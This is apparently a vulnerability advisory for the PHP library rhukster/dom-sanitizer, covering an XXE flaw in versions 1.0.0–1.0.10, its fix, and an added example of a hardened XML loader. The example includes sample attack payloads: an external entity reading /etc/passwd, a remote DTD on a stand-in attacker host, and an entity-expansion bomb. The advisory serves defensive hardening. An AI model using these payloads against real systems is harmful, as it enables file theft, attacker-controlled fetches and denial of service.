rhukster/dom-sanitizer is vulnerable to XML External Entity (XXE)
75
High Risk
The sanitizer hands untrusted SVG, HTML, or MathML to loadDocument, which parses it with loadXML or loadHTML. Before the fix, the parser could process a DOCTYPE and the entity declarations inside it and, where the platform allowed it, resolve external entities, which can lead to local file or network fetches (XXE) and to entity expansion that exhausts memory. The fix strips DOCTYPE and entity declaration syntax from the string before parsing, passes LIBXML_NONET so the load path cannot open remote DTDs or other network resources, and on older PHP runtimes temporarily disables libxml's external entity loader around the parse.
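The following is an added example, not code from rhukster/dom-sanitizer, showing the three measures the advisory describes applied to an untrusted SVG string before it reaches libxml: a string-level strip of DOCTYPE and ENTITY declarations, LIBXML_NONET on the parse, and, on PHP releases before 8.0, the external entity loader disabled for the duration of the parse. The class name, the regular expressions, and the sample payloads are assumptions made for illustration.

```php
<?php
declare(strict_types=1);

/**
 * Added example (not the library's own code): a hardened loader for untrusted
 * XML/SVG. HardenedXmlLoader and its regexes are illustrative assumptions.
 */
final class HardenedXmlLoader
{
    /** @throws InvalidArgumentException when DTD syntax survives or the parse fails */
    public static function load(string $untrusted): DOMDocument
    {
        // 1. Strip <!DOCTYPE ...> (with an optional [ internal subset ]) and any
        //    stray <!ENTITY ...> declarations before libxml ever sees the string.
        $clean = preg_replace(
            ['/<!DOCTYPE\b[^\[>]*(?:\[[^\]]*\])?\s*>/is', '/<!ENTITY\b[^>]*>/is'],
            '',
            $untrusted
        );

        // Belt and braces: if anything DTD-like is left (a malformed or nested
        // subset the regex did not consume), refuse rather than guess.
        if ($clean === null || preg_match('/<!(?:DOCTYPE|ENTITY)\b/i', $clean)) {
            throw new InvalidArgumentException('DOCTYPE/ENTITY declarations are not allowed');
        }

        $doc = new DOMDocument('1.0', 'UTF-8');
        $doc->resolveExternals = false;   // never fetch external entities
        $doc->substituteEntities = false; // never expand entity references into text

        // 3. On PHP < 8.0 the global external entity loader is on by default;
        //    switch it off around the parse and restore it afterwards.
        //    (libxml_disable_entity_loader() is deprecated from 8.0, where
        //    external loading is already off unless explicitly requested.)
        $prevLoader = PHP_VERSION_ID < 80000 ? libxml_disable_entity_loader(true) : null;
        $prevErrors = libxml_use_internal_errors(true);
        try {
            // 2. LIBXML_NONET: even if a DTD reference slipped through, libxml may
            //    not open network resources while parsing.
            if ($doc->loadXML($clean, LIBXML_NONET) === false) {
                $err = libxml_get_last_error();
                $msg = $err ? trim($err->message) : 'parse error';
                throw new InvalidArgumentException('XML rejected: ' . $msg);
            }
        } finally {
            libxml_clear_errors();
            libxml_use_internal_errors($prevErrors);
            if ($prevLoader !== null) {
                libxml_disable_entity_loader($prevLoader);
            }
        }
        return $doc;
    }
}

// Constructed sample inputs (not from the advisory): three DTD-based payloads
// and one benign SVG.
$samples = [
    'file-xxe'       => '<?xml version="1.0"?><!DOCTYPE svg [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>'
                      . '<svg xmlns="http://www.w3.org/2000/svg"><text>&xxe;</text></svg>',
    'remote-dtd'     => '<?xml version="1.0"?><!DOCTYPE svg SYSTEM "http://attacker.invalid/evil.dtd">'
                      . '<svg xmlns="http://www.w3.org/2000/svg"/>',
    'entity-expansion' => '<?xml version="1.0"?><!DOCTYPE lolz [<!ENTITY a "aaaaaaaaaa">'
                      . '<!ENTITY b "&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;">]>'
                      . '<svg xmlns="http://www.w3.org/2000/svg"><text>&b;</text></svg>',
    'benign'         => '<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 10 10">'
                      . '<rect width="10" height="10"/></svg>',
];

foreach ($samples as $name => $xml) {
    try {
        $doc = HardenedXmlLoader::load($xml);
        printf("%-17s parsed, root=<%s>, doctype=%s\n", $name,
            $doc->documentElement->tagName, $doc->doctype === null ? 'none' : 'PRESENT');
    } catch (InvalidArgumentException $e) {
        printf("%-17s rejected: %s\n", $name, $e->getMessage());
    }
}
```

With the DOCTYPE removed, the `&xxe;` and `&b;` references in the payloads are undeclared, so libxml reports a well-formedness error and loadXML returns false: the document is rejected outright rather than parsed with a surprise. The remote-DTD sample parses as a plain empty SVG because the declaration was stripped before the parse, and LIBXML_NONET stays in place as a second line of defence should a DTD reference ever survive the strip. Note that loadHTML is more forgiving than loadXML: an undeclared entity reference there becomes literal text instead of an error, so the same strip and flags are still needed but you should not rely on a parse failure to signal an attempted payload.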
You are affected if you are using a version that falls within the vulnerable range.
rhukster/dom-sanitizer is vulnerable to XML External Entity (XXE) in versions 1.0.0 - 1.0.10.
Upgrade rhukster/dom-sanitizer to a version later than 1.0.10, which contains the fix.